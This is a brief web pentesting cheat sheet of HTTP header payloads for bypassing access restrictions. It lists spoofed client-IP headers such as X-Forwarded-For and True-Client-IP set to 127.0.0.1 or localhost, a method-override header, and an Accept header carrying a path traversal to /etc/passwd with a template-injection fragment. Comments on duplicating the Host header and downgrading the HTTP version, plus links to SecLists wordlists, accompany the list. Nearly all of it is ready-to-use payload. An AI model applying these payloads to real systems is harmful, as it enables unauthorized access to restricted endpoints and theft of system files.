# Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
X-Custom-IP-Authorization:
# Try to repeat same Host header 2 times
Accept: application/json, text/javascript, */*; q=0.01
Accept: ../../../../../../../../../etc/passwd{{'
# Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the host header
# Whitelisted IP 127.0.0.1 or localhost
Forwarded-For-Ip: 127.0.0.1
True-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-By: localhost
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For-Original: localhost
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: localhost
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Server: localhost
X-Forwared-Host: 127.0.0.1
X-Forwared-Host: localhost
X-HTTP-Host-Override: 127.0.0.1
X-Originating-IP: 127.0.0.1
# Fake Origin - make GET request to accesible endpoint with:
# Also try with absoulte url https:/domain.com/admin
X-HTTP-Method-Override: PUT
GET https://vulnerable-website.com/ HTTP/1.1
Host: vulnerable-website.com
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers